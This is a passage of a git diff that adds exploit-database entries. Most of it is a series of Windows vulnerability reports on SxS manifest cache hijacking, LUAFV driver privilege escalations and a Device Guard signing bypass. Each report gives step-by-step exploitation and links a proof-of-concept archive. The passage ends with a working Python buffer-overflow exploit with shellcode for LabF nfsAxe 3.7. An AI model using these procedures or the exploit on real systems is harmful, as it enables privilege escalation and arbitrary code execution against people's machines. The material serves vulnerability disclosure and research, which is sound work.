+Manifest files are stored as XML, typically inside the PE resource section. To avoid having to parse the XML file each time a process starts CSRSS caches the parsed activation context binary format in a simple database. This cache can be queried during process startup or library loading by calling into CSRSS via CsrClientCall resulting in calls to BaseSrvSxsCreateProcess or BaseSrvSxsCreateActivationContext inside SXSSRV.DLL. 
+
+The database is an AVL tree and uses the function BaseSrvActivationContextCacheCompareEntries to identify a hit or miss in the cache. The comparison function only checks the Win32 path to the file, the Win32 base path, the language string, the last write timestamp of the executable and some flags. BaseSrvSxsCreateProcess which is sent during process creation in CreateProcessInternal via the call to BasepConstructSxsCreateProcessMessage queries the cache for a new process, adding an entry to the cache if it doesn’t already exist. All the values used by the cache seem to be passed to BasepConstructSxsCreateProcessMessage with no further checking taking place. If an executable does not have a cached manifest entry a process can trivially add their own entry into the cache which would match against another executable file on the system. Once CSRSS has processed the manifest it’ll map the binary activation context into the new process’ memory and update the ActivationContextData value in the PEB so that it can be used.
+
+Adding an arbitrary cache entry is a problem as the keying doesn’t take into account the different privilege levels in the same session. For example it should be possible to use this to escape a sandbox by filling in a cache entry for a process that will run at normal user privilege, when that process starts it’ll get the arbitrary cache entry allowing the attacker to hijack COM classes or redirect DLLs. There doesn’t seem to be any AppContainer specific flags (but I could have missed them). This is also a, relatively, trivial UAC bypass but of course that’s not a security boundary.
+
+Polluting the cache for the user’s session doesn’t impact other sessions. Session 0 would be an interesting target, however in theory it’s not directly accessible and trying to connect to CSRSS’s ALPC port is rejected. If you have an arbitrary Session 0 code execution bug (such as case 47812) then you could access CSRSS but can it be done without any futher bugs? There’s a quirk in the handling of BaseSrvSxsCreateProcess. The call is made from the session of the process which is creating the new process, not the session of the new process. This means that any Session 0 service which creates user processes in other sessions will cache the manifest of that file in Session 0 CSRSS. Without directly calling CSRSS how can the arbitrary cache entry be created? 
+
+The data passed to CSRSS is based on the data passed to CreateProcess, for example if you execute c:\windows\system32\abc.exe then that’s what’s passed to the cache, this it turns out can be hijacked, as most privileged process creation impersonates the caller (otherwise there might be a security bug) then a normal user can hijack the system drive during CreateProcess. By redirecting the system drive to an arbitrary directory the manifest data is parsed from an arbitrary executable, but the keying information passed to CSRSS is based on what the service thinks it’s created. Turns out this is made all the easier as you Wont Fixed this exactly problem 3 years ago in case MSRC 30096, oops. 
+
+To summarise to exploit this issue for user to privileged process in Session 0 you do the following:
+1. Find an executable which meets the following criteria
+* Can be started by a normal user account and runs in session 0 as a privileged user. COM, services or scheduled tasks are usually good places to look for targets.
+* The executable file has an embedded manifest, if the file doesn’t have a manifest then the cached manifest is not parsed or applied.
+* The executable doesn’t get run very often, once the executable has been cached it’s hard to clear that entry again from a normal user account. You can modify a registry value in HKLM and it might be updated if an installer runs but I didn’t investigate this in detail.
+
+2. Create an executable with a manifest which redirects a COM registration or similar to an arbitrary path, place in a temporary directory with the path information from the the file in 1. E.g. if you want to hijack c:\windows\system32\abc.exe, create the directory %TEMP%\windows\system32 and copy the executable as abc.exe. Clone the last write timestamp from the target file to the newly copied file.
+3. Redirect the system drive to the temporary folder, when opening the file under impersonation it will be redirected to the executable with the target manifest.
+4. Start the process using a service in Session 0 which will also impersonate during creation. WMI Win32_Process::Create is perfect for this.
+5. Once cached start the original executable as the privileged user and induce it to load the hijacked COM class.
+
+One quirk is when the XML file is parsed it doesn’t allow parent relative paths for DLLs, although it will allowing child relative (i.e. ..\..\abc.dll is blocked but test\abc.dll is allowed). This quirk can be circumvented by modifying the binary data before registering it with CSRSS, as the XML file is parsed in the creating process for a sandbox escape. For exploiting session 0 we can just pick a directory the user can write to relative to system32, Tasks is a good a place as any.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project and C++ DLL. The PoC hijacks the CoFilterPipeline Class which is implemented in printfilterpipelinesvc.exe. This only runs as LOCAL SERVICE, but that includes Impersonate and Assign Primary Token privileges which is effectively admin. It was the best I could find at short notice as most of the other targets were used regularly which prevented the user from hijacking the cached entry. When the COM class is created is can be hijacked by querying for one of it’s interfaces, this results in loading the proxy class which the manifest redirects to the file “tasks\hijack\hijack.dll”, as printfilterpipelinesvc is in System32 this results in a controlled DLL being loaded into process.
+
+1) Compile the C# project in Release for “Any CPU”. It will need to grab the NtApiDotNet from NuGet to work.
+2) Run the PoC_ExpoitManifestCache.exe from x64\Release folder, ensuring the folder also contains hijack.dll. 
+
+If the PoC fails with “Query succeeded, likely we couldn't hijack the proxy class” or "Cached manifest not used, perhaps we were too late?" It means that the printfilterpipelinesvc must have been run in session 0 previously. To test reboot the machine and try again as that should clear the cache. I don’t know if the cache gets cleared with power-off and power-on due to the fast boot features.
+
+Expected Result:
+The manifest file is not used by the privileged process.
+
+Observed Result:
+The manifest file is hijacked, an arbitrary DLL is loaded into a privileged process and a copy of notepad is started at LOCAL SERVICE.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46712.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46713.txt b/exploits/windows/local/46713.txt
new file mode 100644
index 000000000..e31cfa553
--- /dev/null
+++ b/exploits/windows/local/46713.txt
@@ -0,0 +1,55 @@
+Windows: LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The LUAFV driver reuses the file’s create request DesiredAccess parameter, which can include MAXIMUM_ACCESS, when virtualizing a file resulting in EoP.
+
+Description:
+
+The LUAFV is an enabled by default file system filter driver introduced in Windows Vista to support old applications which write to administrative locations such a System32 by virtualizing file access when certain criteria are met. The initial criteria is the process’ token needs to have the VirtualizationEnabled flag set to TRUE. This is done automatically for certain process types for app-compat but can be changed through NtSetInformationToken as long as the VirtualizationAllowed flag is also TRUE. This is the case for all normal users, even on Windows 10 1809.
+
+Outside of the token enable flag the file being opened must also meet a set of criteria:
+1) The file being opened is in one of a number of protected locations.
+2) The file can’t be owned by TrustedInstaller, but must have an ACE which grants the administrator full access.
+3) The file name must not have one of a number of banned extensions, such as .exe.
+4) The caller must be denied one of a set of write accesses when opening the file.
+
+If the file is virtualized a copy of the real file or directory is placed in the user’s VirtualStore inside %LOCALAPPDATA%, however for performance reasons (presumably) the driver won’t always do the copy immediately. If a caller’s file creation request meets the four criteria for a file which already exists, but a copy does not currently exist in the VirtualStore then the driver enables Delayed Virtualization on the file. This results in the file being opened with the requested access rights with the original file opened with read only access. If a caller only uses the handle for read operations then those requests are serviced by the original file. If the caller makes a “write” request such as writing to the file or mapping the file writable then the virtualization kicks in, generating the file in the VirtualStore, opening that new file for the original write access and modifies the FILE_OBJECT’s context to now read and write to the new virtualized file. The original FILE_OBJECT can’t be replaced (unlike if the store file already exists which can be dealt with using a reparse operation from the filter) therefore many of the original properties of the “fake” file handle persist such as the granted access.
+
+The vulnerability occurs in this process because during the initial filter process in LuafvPostCreate where delayed virtualization is setup the driver stores the SecurityContext->DesiredAccess as the requested access. This captured access is then used in LuafvPerformDelayedVirtualization when opening the newly created store file. As it’s possible to specify MAXIMUM_ACCESS as the DesiredAccess this results in the “fake” FILE_OBJECT’s handle access being set to FILE_ALL_ACCESS. When opening the store file MAXIMUM_ACCESS could result in a lower set access of access rights, however as the original FILE_OBJECT’s handle can’t be changed the caller can now pass file operations to the “fake” file and the driver will redirect them to the store file without further checking. Meaning if only read access was granted on the store file the user could bypass that and write to it.
+
+You can’t just pass MAXIMUM_ALLOWED on its own during file creation as the driver wouldn’t see that as meeting criteria 4. So you also need to also pass one of the banned write access rights in DesiredAccess. However for the exploit to work this must also be granted on the store file so redirecting the create to an arbitrary location (using say a mount point) isn’t sufficient. However there’s two important things to observe:
+1) As long as using the FILE_OPEN_IF disposition DELETE is a considered a banned write access.
+2) A hardlink to a non-writable file can be created as a normal user. As long as the user has FILE_DELETE_CHILD on the directory containing the link then they’ll also be granted DELETE on the target file.
+
+Therefore we can exploit this by doing the following:
+1) Enable virtualization on the token (this works in 32 or 64 bit processes)
+2) Open an existing file which would meet the rest of the virtualization criteria and isn’t currently virtualized with MAXIMUM_ALLOWED | DELETE as the access mask and FILE_OPEN_IF as the disposition.
+3) Once opened the handle’s granted access will be FILE_ALL_ACCESS. 
+4) Create the target virtualized directory in %LOCALAPPDATA% and add a hardlink to a file to write to as the target virtualized name.
+5) Perform an operation on the “fake” file handle to cause virtualization to occur, such as sending an FSCONTROL. The driver will try and virtualize the file, notice the file already exists and then open the hardlink with MAXIMUM_ALLOWED | DELETE. As DELETE is allowed this will return a read only handle with DELETE access.
+6) Write to the “fake” file handle, as the handle has write access this will pass through the initial system call layers. The driver will then forward the request to the virtual file which was opened only for read but will complete successfully allowing the caller to modify a file they can’t normally write to.
+
+Fixing wise the new store file should be opened with the matching granted access on the original “fake” file handle. That way there can be no mismatch between the access granted on the “fake” handle and the backing virtual store file. It would also be interesting to know how often file virtualization is needed on modern systems and whether you could just remove it entirely.
+
+These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will overwrite an existing file on the disk with arbitrary contents.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC and pass the path to a file to overwrite on the same drive as the virtual store. To prove it works the file should not be writable by the user normally. Note that the file needs to be shareable for write access otherwise it’ll fail due to the sharing violation.
+
+Expected Result:
+The virtualization operation fails.
+
+Observed Result:
+The virtualization operation succeeds with the string “FAKE CONTENT” written to the file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46713.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46714.txt b/exploits/windows/local/46714.txt
new file mode 100644
index 000000000..6fdf5ccb7
--- /dev/null
+++ b/exploits/windows/local/46714.txt
@@ -0,0 +1,42 @@
+Windows: LUAFV Delayed Virtualization Cross Process Handle Duplication EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The LUAFV driver doesn’t take into account a virtualized handle being duplicated to a more privileged process resulting in EoP.
+
+Description:
+
+When a caller creates the virtualized file handle the process token is checked for VirtualizationEnabled. If the flag is set and the file create request meets all the criteria for delayed virtualization the driver collates all the necessary information such as the virtual store location for the resulting file if it needs to be copied and stores it in the file object’s context.
+
+When a caller performs an operation on the file which is considered a write action, such as writing or issuing any FsControl request then the method LuafvPreWrite is called which will call LuafvPerformDelayedVirtualization. This results in the store file being created and the contents of the original file copied into the new store file before assigning the new file to the original “fake” file object so that the user can continue to use the file.
+
+The vulnerability occurs during LuafvPerformDelayedVirtualization. The driver doesn’t take into account the possibility that the virtualized file handle has been duplicated to a new process, specifically one which runs at higher privileges. For example if a normal user application creates the virtualized file, but then gets a SYSTEM service to duplicate the handle to itself and call one of the mechanisms to trigger LuafvPerformDelayedVirtualization the file creation will run as the SYSTEM user not the original user, but the path to the file will be the original user’s virtual store.
+
+Examples of possible duplicate primitives would be RPC/COM services which duplicate the handle either explicitly through the system_handle RPC attribute or manually by querying for the caller’s PID and calling DuplicateHandle. Another would be a kernel driver which opens a handle in the current user’s context (or takes a handle parameter) but passes that handle to a system thread for a long running operation. In both these cases the file operation does have to occur without the privileged service impersonating the original caller.
+
+You can exploit this behavior in at least two ways. Firstly you could replace the virtual store directory with a mount point. When the virtualization process goes to create the final file it will follow the mount point and create the file in an arbitrary location. The contents of the file are completely controllable by the caller, but even if the privileged code overwrites part of the file the original opened handle can be used to get write access to the file afterwards. The second way would be to drop a hardlink to a file that the privileged service can write to in the virtual store, then when the file is opened by the service it becomes possible for the original caller to modify the file.
+
+Fixing wise I’d probably double check something in LuafvPerformDelayedVirtualization before continuing with the file copy. Perhaps something as simple as user SID + IL would be sufficient, or only for users in the same authentication session as that would even prevent its abuse in UAC cases.
+
+These operations can’t be done from any sandbox that I know of so it’s only a user privilege escalation. Note that the user which manipulates the duplicated handle doesn’t need to be an admin, as it’d be possible to modify files owned by that user so it might be possible to abuse this for cross-session or LOCAL SERVICE/NETWORK SERVICE attacks.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will create the file dummy.txt with arbitrary contents inside the windows folder. Note that this PoC is manual, I’ve not gone through and worked out a system service which will perform the necessary operations but I’m confident one will exist as handle duplication is a fairly common technique and you don’t even need to write to the file just perform one of the known actions.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. If there are no errors you should see the line: “Re-run the PoC as an admin with arguments - X Y”.
+3) Run as the PoC again as an admin, passing X and Y as arguments from step 2. This admin can be SYSTEM, it doesn’t matter what session or user it runs as.
+
+Expected Result:
+The virtualization operation fails.
+
+Observed Result:
+The virtualization operation succeeds and the file c:\windows\dummy.txt is created with arbitrary contents.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46714.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46715.txt b/exploits/windows/local/46715.txt
new file mode 100644
index 000000000..b971e7ea0
--- /dev/null
+++ b/exploits/windows/local/46715.txt
@@ -0,0 +1,70 @@
+Windows: LUAFV LuafvCopyShortName Arbitrary Short Name EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The LUAFV driver bypasses security checks to copy short names during file virtualization which can be tricked into writing an arbitrary short name leading to EoP.
+
+Description:
+
+When creating a virtualized file in LuafvCopyFile one of the things that the driver copies across is the short name of the original file by calling LuafvCopyShortName. This uses the FileShortNameInformation information class to set the short name, however the problem with using this is it normally requires SeRestorePrivilege to be enabled, which a non-administrator won’t have access to. Therefore to bypass the privilege check the virtualized file is reopened without security checks, which results in the check being ignored.
+
+The code looks roughly like the following:
+
+NSTATUS LuafvCopyShortName(PFLT_INSTANCE Instance, 
+                                                     PFILE_OBJECT ReadObject, 
+                                                     HANDLE WriteHandle) {
+  HANDLE FileHandle;
+  PFILE_OBJECT WriteObject;
+  NTSTATUS = FltCreateFileEx2(
+          LuafvDriverData,
+          Instance,
+          &FileHandle,
+          &WriteObject,
+          FILE_WRITE_ATTRIBUTES,
+          ...,
+          IO_NO_PARAMETER_CHECKING);
+  FILE_NAME_INFORMATION Name = {};
+  if (NT_SUCCESS(status)) {
+    if (NT_SUCCESS(FltQueryInformationFile(Instance, ReadHandle, &Name, sizeof(Name), 
+                             FileAlternateNameInformation))) {
+        status = FltSetInformationFile(Instance, WriteObject, 
+            &Name, IoStatusBlock.Information, FileShortNameInformation);
+     }
+  }
+  return status;
+}
+
+We can see in the code the writable file is re-opened with new access and without specifying IO_FORCE_ACCESS_CHECK. As FILE_OPEN_FOR_BACKUP_INTENT is specified then NTFS will mark this file as having restore privilege, even though the caller doesn’t, as the previous mode will be KernelMode. The original file is then queried for its alternate name (which is really its short name) and the short name is set through the FileShortNameInformation which will now succeed due to the way the file handle was opened.
+
+Of course the question is how would you get this code to write an arbitrary short name? Although it’s not obvious if the name of the file is already a short name (as in a 8.3 DOS compatible name) then FileAlternateNameInformation doesn’t fail but returns the normal file name back to the caller. Therefore we can exploit this as follows:
+
+1) Create a file with the arbitrary short name inside a directory which is virtualized, ProgramData is ideal for this as we can create arbitrary files. Make the file writeable only to administrators.
+2) Open the file for virtualization, but don’t do anything to cause delayed virtualization to occur.
+3) Use some symbolic tricks in the VirtualStore directory to cause the creation of that file to be redirected to a long name which would normally have an auto-generated short name.
+4) Force the delayed virtualization to occur, the file with the long name will be created, however the short name will be read from the source file which has an arbitrary name. The short name is written bypassing security checks.
+
+There’s probably other ways of doing this without symbolic link tricks, for example there’s a race between the time the file is opened and when the short name is queries. As the file is opened with FILE_SHARE_DELETE it should be possible to rename the source file between the initial open but before reading the short name.
+
+What you could do with this ability is another matter. You could possibly trick some parsing operation which is relying on short names. Or you could create a directory which had two “normal” names rather than one auto generated one which could trick certain things. At any rate the EoP is the fact we can do this without needing SeRestorePrivilege.
+
+I’m not going to speculate on how to fix this, as said while you might be able to block mount point traversal (seems unlikely as the user’s profile could be on a remote share or another drive) there’s probably other ways around this. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will create an arbitrary file with an arbitrary short file name.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC passing the name of the target file to create (with a long file name) and the arbitrary short file name.
+
+Expected Result:
+The virtualization operation fails.
+
+Observed Result:
+The virtualization operation succeeds and the file has an arbitrary short name.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46715.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46716.txt b/exploits/windows/local/46716.txt
new file mode 100644
index 000000000..6ac1a4e6c
--- /dev/null
+++ b/exploits/windows/local/46716.txt
@@ -0,0 +1,39 @@
+Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass
+Platform: Windows 10 1809 (not tested earlier). Note I’ve not tested this on Windows 10 SMode.
+Class: Security Feature Bypass
+
+Summary: 
+
+The NtSetCachedSigningLevel system call can be tricked by the operation of LUAFV to apply a cached signature to an arbitrary file leading to a bypass of code signing enforcement under UMCI with Device Guard.
+
+Description:
+
+As I’ve hit this API multiple times by now I’m not going to explain its operation. The novel aspect of this issue is that you can get the LUAFV driver to win the signing race between reading the file to determine the hash to sign and the file the kernel EA is assigned to.
+
+The exploit is as follows:
+
+1) Create a file with the contents of a valid Microsoft signed file, such as notepad.exe in a virtualized location.
+2) Get LUAFV to virtualize that file by requesting DELETE access. DELETE is not considered a write access right for the purposes of any checks in the signing process.
+3) Copy the unsigned executable to the virtual store with the target virtualized name.
+4) Call NtSetCachedSigningLevel on the virtualized file specifying flag 4. 
+
+This sequence results in the signing code reading the virtualized file, which contains the contents of notepad.exe and generating the signature based on that data. However when it goes to write the kernel EA the LUAFV driver considers that a write operation and virtualizes the file underneath. As we’ve created an arbitrary file in the virtual store the driver binds the file object to the unsigned file before writing out the kernel EA. This results in the EA going to the unsigned file rather than the original signed file. As you can’t virtualize files with executable extensions you must ensure the signed file has an allowed extension, however once you’ve signed the file you can rename it to something more appropriate.
+
+Note that I have checked that Windows 10 Pro SMode does load the LUAFV driver, however I’ve not checked that this bypass will work on it (but no reason to believe it doesn’t).
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will sign an arbitrary DLL file the map it into memory with the Microsoft only signature mitigation enabled.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC passing the path to an unsigned DLL which will do something noticeable in DllMain (such as popping a message box).
+
+Expected Result:
+The cached signature operation fails.
+
+Observed Result:
+The an arbitrary file is cached signed and can be loaded with an elevated process signature level.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46716.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46717.txt b/exploits/windows/local/46717.txt
new file mode 100644
index 000000000..49886f364
--- /dev/null
+++ b/exploits/windows/local/46717.txt
@@ -0,0 +1,56 @@
+Windows: LUAFV Delayed Virtualization Cache Manager Poisoning EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The LUAFV driver can confuse the cache and memory manager to replace the contents of privileged file leading to EoP.
+
+Description:
+
+NOTE: This is different from issue 49895, that opens a backing file which could be overwritten as it wasn’t opened with the correct permissions. This issue instead replaces the cache data for an existing system file. Also note the additional section at the end which describes how this issue also causes a Bug Check. I’m not convinced it’s exploitable so I’m not reporting it separately.
+
+The LUAFV driver supports many normal file operations to make virtualization as seamless as possible. This includes supporting memory mapping the file. When using delayed virtualization the driver allows mapping the original file read-only (as a data section or image section) without automatically creating the file in the virtual store. This trick is achieved by copying the real file’s SECTION_OBJECT_POINTERS (SOP) pointer from the file object opened in LuafvDelayOrVirtualizeFile to the top-level “virtual” file object. 
+
+When creating a new section for a file object the kernel calls MiCreateImageOrDataSection. After checking some parameters it calls MiCallCreateSectionFilters. This is important for virtualization as this results in calling LuafvPreAcquireForSectionSynchronization in the LUAFV driver. If that function detects that the caller is trying to map the section writable then LuafvPreWrite is called which will complete the delayed virtualization process, and will update the SOP pointer of the “virtual” file to the newly created backing file. If the file is not being mapped writable then the LUAFV driver leaves the SOP pointing to the “real” file.
+
+MiCreateImageOrDataSection then checks whether the SOP::DataSectionObject CONTROL_AREA is populated. If not the kernel calls into MiCreateNewSection to setup a new one otherwise it’ll try and reuse the existing one which is present in the “virtual” file. If a new CONTROL_AREA is created it contains a reference to the “virtual” file, not the underlying system file. This control area gets written into the SOP structure of the “virtual” file, which when performing a read-only mapping results in writing to the SOP structure of the underlying “real” file. 
+
+The SOP structure is the responsibility of the filesystem driver, so when opening an NTFS file it’s the NTFS driver which allocates and sets up this pointer. However the contents of the structure are the responsibility of the cache manager. In order to support sharing mappings, especially for image mappings, the NTFS driver ensures that the same file in a volume returns the same SOP structure even if the FILE_OBJECT pointer is different. This is where the bug lies, perhaps it’s easier to explain how to exploit this:
+
+1) Open a file for read/write access which will be delay virtualized. For example a file in system32 which isn’t owned by TrustedInstaller.
+2) Create a read-only section based on the virtualized file. As this is read-only the LuafvPreAcquireForSectionSynchronization function won’t complete the delayed virtualization. Do not map the section.
+3) As long as the file doesn’t already have a DataSectionObject entry (likely if the file’s never opened/read from) then a new CONTROL_AREA is created, backed by the “virtual” file.
+4) Now cause the delayed virtualization process to complete, by sending an FSCONTROL code. The “virtual” file is now backed by a file in the virtual store which can be modified by the user, and the “virtual” file’s SOP is replaced accordingly. However the DataSectionObject in the “real” file’s SOP still refers to the virtual file. Now when reading data from the “real” file handle (even one opened directly without virtualization) the cache manager reads page contents from virtual store file, not the real file.
+
+Once you’ve replaced a system file you can get direct EoP by replacing with the contents with a  PE file which can be loaded using services such as the “Diagnostics Hub Standard Collector Service” which I’ve detailed before. This works because the exploit has replaced the cache for that file and as its shared between all FILE_OBJECT instances (at least until the cache cleans it up) then the image section is created backed on the cached data. The replaced file contents will be also be returned for direct reads, the file doesn’t have to be mapped to return the poisoned cache data.
+
+One limitation to this vulnerability is you can’t extend the length of the file, but there are suitable files in system32 which can contain a suitably small PE file to perform the full exploit. Note that it also doesn’t really overwrite the file on disk, instead it poisons the cache with the wrong backing file. After a reboot the file will be back to normal, even if the cache is flushed back to disk (perhaps a privileged process opened the file) I’d expect the new data to be flushed back to the store file not the “real” file.
+
+Fixing wise, one way you could go would be to always virtualize the file when mapped as a section regardless of the requested access. However I can’t be certain there’s not another route to this which could be exploited, for example just reading from the file might be sufficient to poison the cache if done at the right time.
+
+These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation. 
+
+ADDITIONAL NOTE:
+As the FILE_OBJECT can’t be completely locked across all the file operations the kernel makes use of Auto Boost to lock certain structures such as the SECTION_OBJECT_POINTERS and CONTROL_AREAs. The LUAFV driver doesn’t know anything about this so it’s possible to get delayed virtualization to complete from another thread in the middle of section creation resulting in mismatched pointers and ultimately a bug check. The easiest way to achieve the bug check is to map a virtualized file as an image with the Microsoft Signed mitigation policy enabled. If the file isn’t correctly signed then it will cause the section creation to fail, but after the CONTROL_AREA has been setup. As it’s possible to oplock on the kernel opening catalog files the delayed virtualization process can be completed at the right moment resulting in a lock mismatch when tearing down the setup CONTROL_AREA.
+
+I can’t really tell if this is exploitable or not (I’m siding with no), but as it’s related I thought I should report it to ensure what ever fix for the current issue covers this edge case as well, or at least doesn’t make it work. I’ve provided a kernel crash report “additional_crash.txt” with this report, and I can provide a PoC if required.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will poison the cache for the file license.rtf in system32 with arbitrary contents. Note it uses a hardlink to virtualize the file, but it doesn’t have to as it could open the system32 file itself. It’s just done as it was easier to test this way and doesn’t impact the exploit. Also note that if the license.rtf file has been opened and the cache manager has created an entry then the exploit fails. In theory this would be deleted eventually (perhaps only under memory pressure), but a quick reboot usually fixes it unless your system opened license.rtf everytime the system starts.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) Open the file %WINDIR%\System32\license.rtf in notepad to see the contents.
+
+Expected Result:
+The license.rtf file contains the original RTF contents.
+
+Observed Result:
+The virtualization poisoned the contents of license.rtf with a new text string.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46717.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46718.txt b/exploits/windows/local/46718.txt
new file mode 100644
index 000000000..d0c975054
--- /dev/null
+++ b/exploits/windows/local/46718.txt
@@ -0,0 +1,49 @@
+Windows: LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The LUAFV driver has a race condition in the LuafvPostReadWrite callback if delay virtualization has occurred during a read leading to the SECTION_OBJECT_POINTERS value being reset to the underlying file resulting in EoP.
+
+Description:
+
+NOTE: While it has a similar effect as issue 49960 I believe it is a different root cause which might still be exploitable after any fixes. This bug is actually worse than 49960 as you can modify the original file rather than just the cached data and you can do it to any file which can be virtualized as you don’t need to have a file which has a NULL CONTROL_AREA pointer.
+
+When a IRP_MJ_READ request is issued to a delay virtualized file the filter driver first calls LuafvPreRedirectWithCallback which determines if the file is virtualized, it then sets the underlying, read-only file as the target file object for the filter processing as well as storing the file object in the completion context. When the read operation completes the LuafvPostReadWrite method is called which will inspect the completion context and copy out the file position and the SECTION_OBJECT_POINTERS value. 
+
+As there’s no locking in place at this point if the file delay virtualization is completed between the call to LuafvPreRedirectWithCallback and LuafvPostReadWrite then the SECTION_OBJECT_POINTERS and cache from the read-only file is used to overwrite the top-level “fake” file object, even though LuafvPerformDelayedVirtualization would have changed them to the new read-write virtual store file. By exploiting this race it’s possible to map the “real” file read-write which allows you to modify the data (you can probably also just write to the underlying file as well).
+
+The trick to exploiting this bug is winning the race. One behavior that makes it an easy race to win is the delayed virtualization process passes on almost all CreateOptions flags to the underlying file create calls. By passing the FILE_COMPLETE_IF_OPLOCKED flag you can bypass waiting for an oplock break on IRP_MJ_CREATE and instead get it to occur on IRP_MJ_READ. The following is a rough overview of the process:
+
+1) Open a file which will be delay virtualized and oplock with READ/HANDLE lease.
+2) Open the file again for read/write access which will be delay virtualized. Pass the FILE_COMPLETE_IF_OPLOCKED flag to the create operation. The create operation will return STATUS_OPLOCK_BREAK_IN_PROGRESS but that’s a success code so the delayed virtualization setup is successful.
+3) Create a new dummy file in the virtual store to prevent the driver copying the original data (which will likely wait for an oplock break).
+4) Issue a read request on the virtualized file object, at this point the IRP_MJ_READ will be dispatched to “real” file and will get stuck waiting for an oplock break inside the NTFS driver.
+5) While the read request is in progress issue a IRP_MJ_SET_EA request, this operation is ignored for oplock breaks so will complete, however the LUAFV driver will call LuafvPreWrite to complete the delayed virtualization process.
+6) Close the acknowledge the oplock break by closing the file opened in 1. 
+7) Wait for read operation to complete.
+8) Map the file as a read/write section. The data should be the “real” file contents not the dummy virtual store contents. Modifying the file will now cause the “real” file to be modified.
+
+Note that even if you filtered the CreateOptions (as you should IMO) the race still exists, it would just be harder to exploit. Fixing wise, you probably want to check the virtualized object context and determine that the the delay virtualization has already occurred before overwriting anything in the top-level file object.
+
+These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation. 
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will map the license.rtf file as read-write, although it won’t try and modify the data. However if you write to the mapped section it will change the original file.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) The PoC should print the first 16 characters of the mapped file.
+
+Expected Result:
+The mapped data should be all ‘A’ characters.
+
+Observed Result:
+The mapped data is the actual license.rtf file and it’s mapped writable.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46718.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46737.py b/exploits/windows/local/46737.py
new file mode 100755
index 000000000..b72835fea
--- /dev/null
+++ b/exploits/windows/local/46737.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
+# Date: 20-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.labf.com/nfsaxe
+# Version: 3.7
+# Software Link : http://www.labf.com/download/nfsaxe.exe
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# PoC:
+# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
+# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
+# 3.) Click Start and calc pops
+#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)
+
+shellcode = ("\x31\xC9"                     
+        "\x51"                            
+        "\x68\x63\x61\x6C\x63"            
+        "\x54"                            
+        "\xB8\xC7\x93\xC2\x77"            
+        "\xFF\xD0")                 
+		
+buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)
+
+payload = buffer
+try:
+    f=open("nfsaxeping.txt","w")
+    print "[+] Creating %s bytes ping payload.." %len(payload)
+    f.write(payload)
+    f.close()
